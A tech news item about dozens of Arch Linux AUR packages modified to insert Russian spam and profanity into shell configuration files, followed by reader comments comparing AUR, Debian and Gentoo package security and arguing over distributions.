Russian Spam and Profanities Are Now Plaguing the Arch Linux AUR

The Arch Linux User Repository "AUR" is facing another issue just days after more than 1,500 packages were found carrying malware. According to Phoronix, over 70 AUR packages have reportedly been modified to insert Russian spam and profane messages into users' shell configuration files. From the report: Nicolas Boichat with his AI/LLM detection bot detected some questionable messages appearing in AUR content. Russian messages were being added post-install to the bashrc / zshrc / Fish configuration, etc containing offensive messaging. Those commits happened on the 14th, after the recent malware fiasco. And then over the past day reporting on dozens of AUR packages having similar Russian messages containing offensive language.

The latest update on that thread indicates more than 70 AUR packages having this Russian spam / offensive messaging. Among those various Python packages, Ruby packages, Llama.cpp, and others. At least the AI/LLM bots are proving helpful here in proactively picking up on some of the AUR abuses until the fundamental situation can be better handled.

Re:

[drinkypoo]

The beauty of the open source lie, that there are any eyeballs at all.

Yeah, we never discovered this problem, because there are no eyeballs at all.

If you can't learn to think, at least learn to read.

This is validating my decision to stay on Debian

[reiscw]

I run Linux as a desktop and have done so since around 2008. I started with Ubuntu, and after a while (probably around 5-10 years) I moved to Debian. Every once in a while, I'll read about one of the new Arch-based distros (Manjaro, Calyx OS) and decide to give it a try. After about a few hours, I realize that some of the programs I use on a regular basis are not available (easily) outside of the AUR. When you read about the AUR as an intermediate user, you understand how dangerous it can be, but you feel like it's necessary to use Linux as your main computing device. There are applications that are packaged as DEB/RPM but not for Arch, and are not available as Flatpaks (or AppImages or Snaps). Some of these are proprietary.

One in particular which comes to mind is Insync, which I use to synchronize Google shared folders to my home directory. It is much easier to use than rclone and the latency is a lot lower. If I move to an Arch-based system, I have to get that from the AUR. Now, I do feel like I have the experience to read the PKGBUILD and audit it for weird stuff going on, but I'm also not arrogant enough to believe that someone could not sneak something by me.

I use Debian Stable, and all of my software is available. Some of the software is dated, obviously; I'm running KDE 6.3.6 and kernel 6.12. But in general, I don't have huge issues with that, and if there was an application I needed to update, I probably could do it either with Flatpaks or compiling from source. Honestly though, I cannot remember the last time I needed to do that. Maybe it helps that I'm not a professional software developer and I don't need access to the latest versions of everything. I also know that some Debian users address those issues by running testing or unstable.

There's a part of me that wonders if these attacks are related to the surge in popularity of Calyx OS. I teach high school, and I noticed last year that one of my ninth graders was running KDE on his laptop. I asked him what distro he was running, and he said Calyx OS. I was surprised by that - most of the time when I run into a high school kid they're running something in the Debian family (including Ubuntu and its derivatives).

Re:

[unrtst]

I'm also a Debian fan, but I'm not sure this Arch issue validates anything for Debian. How is their supply chain different/improved/more-secure? Please note, I simply don't know. If someone could confirm this is far less likely on Debian because yada yada yada.., that'd be great.

Re:

[thesinfulgamer]

It's far less likely because Debian has no user repository like Arch.... plus their packages are a year out of date on a good day.

Re:

[unrtst]

Thanks! I overlooked the user repo part.

Re:

[DewDude]

And that is a problem. You can't run Debian on new hardware.

Why did I go Arch? I had a new laptop. I couldn't even boot Ubuntu or Debian installers. Nothing would boot on that thing because it was too new. I wasn't waiting another year for the LTS cycles to refresh.

That's the other problem with Linux. If you use the standard model....you're SOL on new hardware. Especially if it's a full platform refresh like Dells were last year.

Re:

[test321]

We generally trust packages produced by distro developers, whether it's Arch, Debian or others. A distro packager could be a mole, but it's easy for them to get caught. What we don't trust are user repositories, where anons like you and me can publish a binary. Assuming the Debian developers are trustworthy, you can trust Debian. If you take your Debian and add PPA (custom repositories, originally developed for Ubuntu) then you're susceptible to malware added by the PPA publisher.

Personally I use Gentoo. As

Re:

[robot5x]

What we don't trust are user repositories, where anons like you and me can publish a binary.

Great point supporting the wrong argument. AUR does NOT host binaries - there is NO WAY for anon to make a binary available directly to Arch users. Let's all get this clear.

What is the AUR?

The AUR (Arch User Repository) is a community-driven repository of build scripts called PKGBUILDs. It doesn't host packages themselves — it hosts recipes that tell your system how to fetch sources and compile/package software locally.

What it hosts: PKGBUILDs for software not in the official repos — proprieta

Re: This is validating my decision to stay on Debi

[devslash0]

Thanks. I just made a similar point below.

If you don't know how to review a PKGBUILD file, then perhaps AUR is not for you.

Re:

[test321]

Thanks for correcting to my wrong information.

Re:

[Anonymous Coward]

it's almost impossible to imagine that a compromised build script would just pick up votes and make it to a repo.

The russian trolls could certainly band together and upvote their malware ridden AUR packages. The obfuscated C contest shows again and again that the assumption, that bad code would be obvious is rather unrealistic, for example in cable2 [github.com], or the xz utils backdoor [wikipedia.org].

Re:

[unrtst]

Excellent information - thank you!

So in summary AUR is exactly like your Gentoo compile scripts.

There seems to be one glaring difference:
* AUR PKGBUILDs are apparently community driven with no vetting besides community votes.
* Gentoo ebuilds are maintained by official Gentoo developers - devs taking ownership of specific packages or official working groups on core components and complex stuff. Community provided ebuilds and updates get run through an official dev.

HOWEVER, Gentoo has community overlays, like Project:GURU. These seem to be exactly like AUR PKGBUILDs.

In

Re:This is validating my decision to stay on Debia

[Anonymous Cward]

The difference between the AUR and Debian repositories is that there's a natural level of checking built into the process. For simplicity, I'm going to completely ignore Debian Stable and talk about Unstable, which ultimately gets far less scrutiny due to less security team involvement.

Each category (or group) of packages generally has a team of people who work together to commit changes to Unstable, aided by senior developers who have non-maintainer upload rights to dip in and help out if packages end up lacking named maintainers. There's no concept of a random person with no history of contributing immediately taking over orphaned packages, and while a package maintainer owns the responsibility of making sure changes work, folks definitely aren't alone when it comes to QA/QC.

Debian also splits out everything so that any potentially reusable dynamic libraries can be re-used by as many other packages as possible. If there's a new dependent library being introduced which no other package already makes use of, it needs to be added to the Debian archive as a brand new package, where the process is ultimately overseen by a separate team of people. Even if all that scrutiny doesn't pick up on something, Canonical engineers also use Debian's packages as the basis for Universe/Multiverse in Ubuntu and have to perform their own checks before syncing over new packages in from Debian Unstable when MOTU ("Masters Of The Universe" aka. community contributors mentored by Canonical) put in a request as part of maintaining the packages they look after.

The end result is potentially even better scrutinised than the packaging approach typical macOS and Windows apps receive, due to the number of separate individual maintainers taking responsibility for dependent libraries, as opposed to an independent or small team of developers taking responsibility for everything. However, it does also mean if one common library gets subverted in some way, especially by a compromise of the upstream project (as people saw with the xz backdoor attempt) then the net impact could be far wider than with vendored libraries (how packages work with macOS/Windows) where developers can choose to stick with older versions for their application for longer. Of course, that's somewhat mitigated by that thing I'm ignoring called Debian Stable... =]

Note: I'm not a Debian Developer (just someone who ends up reading way too much) so it's possible some of what I'm saying isn't as accurate as it could be, but I hope this gives you a general gist of the differences.

Re:

[unrtst]

Thank you! This goes even further than the above comments :-)

Re:

[robot5x]

No - the difference between AUR and Debian repos is that Debian repos are 'official' binaries, while AUR is a bunch of random build scripts uploaded by potentially anyone. In other words, exactly the same difference as between AUR and Arch repos.

Re:

[thesinfulgamer]

You can do the usual ./configure make sudo make install thing on the actual source, even if it's not the arch way, and writing PKGBUILDS for packages isn't super difficult, even my dumbass has an AUR package because waterfox wasn't getting updated fast enough.

Re: This is validating my decision to stay on Debi

[devslash0]

It's only dangerous if you don't know how to handle it.

AUR itself doesn't host any binaries. It provides build scripts called PKGBUILDs. They, in turn point at source repositories where the binaries come from.

The official guidance is that you should review the PKGBUILD file before compiling/making your package. This involves checking the sources referenced in the file as well as the contents of the build script itself.

If you don't know how to review a PKGBUILD file, then perhaps AUR is not for you.

Re:

[DewDude]

Look guy.....Debian isn't any safer from this.

Here's the thing...as everyone pointed out...it's AUR. User repositories. Now...Arch does have a more centralized system...which is good; but Debian isn't immune becuase you STILL have third-party repositories. Those third-party repositories still have the same failure points. Maybe AUR is a little easier...anyone can adopt an orphaned repository; but one might notice a dead repo coming back to life and look at it with caution.

This exact same thing could happen

And this is not new

[rickb928]

We used to call them griefers. Now they pretend to have meaning.

Stay away from mah Gentoo

[sinkskinkshrieks]

Filthy Ruzzian bots begone... go meat assault in Donbas.

Re:

[HiThere]

Odd. My first suspect was either Ukrainians or some of their sympathizers.

Re:

[ArchieBunker]

What possible motive would Ukraine have to fuck with a poorly maintained linux distribution?

Re:

[HiThere]

The motive would be to insult the Russians.

Re:

[karmawarrior]

Do you seriously think you're fooling anyone?

Snowden

[Big Bipper]

Don't forget what Snowden revealed. The NSA routinely covers its tracks by salting its code with comments in foreign languages. This might actually be evidence of your tax dollars at work, or not. We'll probably never know for sure unfortunately. That, and AI Slop, are the sad part. We don't know what to believe, only that most of what we see online, or on the mainstream media, is fake.

Re:

[logjon]

When Russia hacks something, they leave their fingerprints all over it. When anyone else hacks something, they leave Russian fingerprints all over it.

Blyatiful!

[trelanexiph]

I told them that Katyusha, my Russian Blue cat couldnâ(TM)t be trusted with commit rights.

I guess they had to find out the hard way.

Sad Days For Arch

[SlashbotAgent]

This will severely damage Arch, possibly beyond repair.

It will be sad to see Arch go. I've personally never used it. But, I have and do use their documentation. Arch docs are fantastic, no matter what distro you use.

Arch will be fine

[Dasher42]

AUR is not an official repository for Arch distributions. It requires extra tooling; you can't install from the AUR in pacman, and AUR has historically been a risk for breakages with the official updates. It's always been a known risk, and in the age of AI malware, it will have to be adapted or removed.

There's nothing wrong with the actively maintained Arch distributions. These are the same pains every distribution has to deal with presently.

Re:

[Bahbus]

These are the same pains every distribution has to deal with presently.

No one outside the Arch (and it's derivatives) community is dealing with any external pains at the moment.

Re:

[robot5x]

The 'pain' here is that Arch wanted to provide a way for users to manage 'ad hoc' packages within the pacman system and make them available to other users if necessary. For reference I can find examples of only 4 other linux distros that support an equivalent:

• Gentoo GURU (Gentoo User Repository), an official user-contributed overlay. Also the broader ebuild overlay ecosystem.
• NixOS NUR (Nix User Repository), explicitly modeled on the AUR.
• Slackware SlackBuilds.org, community build scripts (though run inde

Re:

[Bahbus]

The 'pain' here is that Arch wanted to provide a way for users to manage 'ad hoc' packages within the pacman system and make them available to other users if necessary.

Because Arch's entire design philosophy, and how they go about it, is stupid.

I can find examples of only 4 other linux distros that support an equivalent

And these aren't having any issues. I don't know much about Nix other than it is an immutable distro, probably harder to target. The rest, barely anyone uses. Gentoo, Slackware, and CRUX are all have extremely low user counts. Arch and Nix are the only two of these five that are still actually growing, the rest either are holding on or dying. So they aren't good targets.

but I think it's idiotic to paint Arch as a whole in a negative light for a niche user contribution add-on that is totally separate to their official package line

AUR is just one reason to paint Arch in a negative light. Thei

Re:

[robot5x]

Their entire approach and mindset leaves users vulnerable.

Genuinely interested to know more about why you think that. I've used Arch for about 20 years so I'm probably unconsciously a fanboi, but pacman is the approach to package management that I've hated least of all I've tried, so I stayed there.

Re:

[Bahbus]

Nothing against pacman. I even occasionally use an Arch Distrobox to use pacman. Arch does not support SELinux but it does support AppArmor and TOMOYO. However, due to their entire philosophy they neither include any security frameworks nor does their install script/guides mention or suggest using them. At the barest of minimums they should be recommending that users install and configure a security framework - especially in today's age. If users don't want it, fine. But it should be that the user has to sa

Re:

[DewDude]

Just what about the design philosphy is stupid? Is it any dumber than what other distros have done?

Look at Ubuntu? How fucking bloated is that installer. What the fuck is cloud-init? I'm running one physical machine and the fucking thing insists it needs cloud-init and all sorts of other cloud bullshit. Not to mention...what the fuck is the point of having 3 or 4 gigs worth of ISO if the installer won't fucking use it. You can't even install Ubuntu without network. It's not grabbing updates...it's grabbing

Re:

[Bahbus]

Just what about the design philosphy is stupid?

The DIY mindset is stupid.
The lax attitude towards system security is stupid.
The maintenance and micromanagement required of Arch is stupid.

Is it any dumber than what other distros have done?

Yes.

Look at Ubuntu

Ubuntu is also trash. I'd say even worse than Arch, but it is easier to use for newbies comparatively. Debian, not great. Mint, absolute trash.

one of the few rolling distributions that actually stays halfway updated and not 2 years behind like everything else

Plenty of distros that stay up-to-date with any upstream updates.

I mean maybe you need to back and look at what this OS was...back before package managers.

No. I don't. What the OS was before package managers is completely irrelevant to anything.

I prefer the Red Hat/Fedora family of Linux, but I also like, in gener

Re:

[DewDude]

Yes...I love having a kernel that's 2 years old and won't boot on modern hardware.

Please tell me how Debian and Ubuntu are so superior. Why...they actually started running on my Dell only a year after I actually acquired that. Wow...if it's such the better designed OS then I guess other distros might fall in line....

except Arch booted and ran on that thing day 1 because it's not a whiny little bitch.

If Arch is so stupid why was it the only thing that ran? If the design philsophy is so bad...why does the alm

Re: Sad Days For Arch

[devslash0]

Arch is not going anywhere, mate.

Re:

[DewDude]

It's the end of open source.

This is going to be proof to more companies as to why they need to go back to closed. It will be a keypoint in why open source development needs to end.

This isn't just the death of Arch...it's the opening act of the death of Linux. Because corporate interests are rapidly leaving. I'm seeing more projects get discontinued in favor of closed source.

None of us are going to have any choices in a few years. There won't be open source. There won't be community development.

Build Script?

[allo]

Isn't AUR showing you the build script, before it executes it? You certainly read what shell script from some unknown user you're running, didn't you?

This is utterly unsurprising.

[ElderOfPsion]

Russia always was our Arch enemy.

Archlinux is just tech dimwits and hackx0r mimics

[yanestra]

Archlinux developer and d00fus are synonymous, no wonder they are helpless and disoriented right now.

Re:

[DewDude]

I bet you can't run Linux unless it's Ubuntu because you're a n00b.

Something like...? -

[He Who Has No Name]

"ÐsÑÑÐÑÐ, Ñ Ð½Ð ÐоÐÑOEÐÑfÑZÑÑOE Arch."

BTW, I use

[mdhoover]

Arch idi na hui, blyat

Cyka blyat

[yurikhan]

1. Blindly trust an unofficial repo
2. Get very mild malware
3. ...
4. BITCH ABOUT IT!!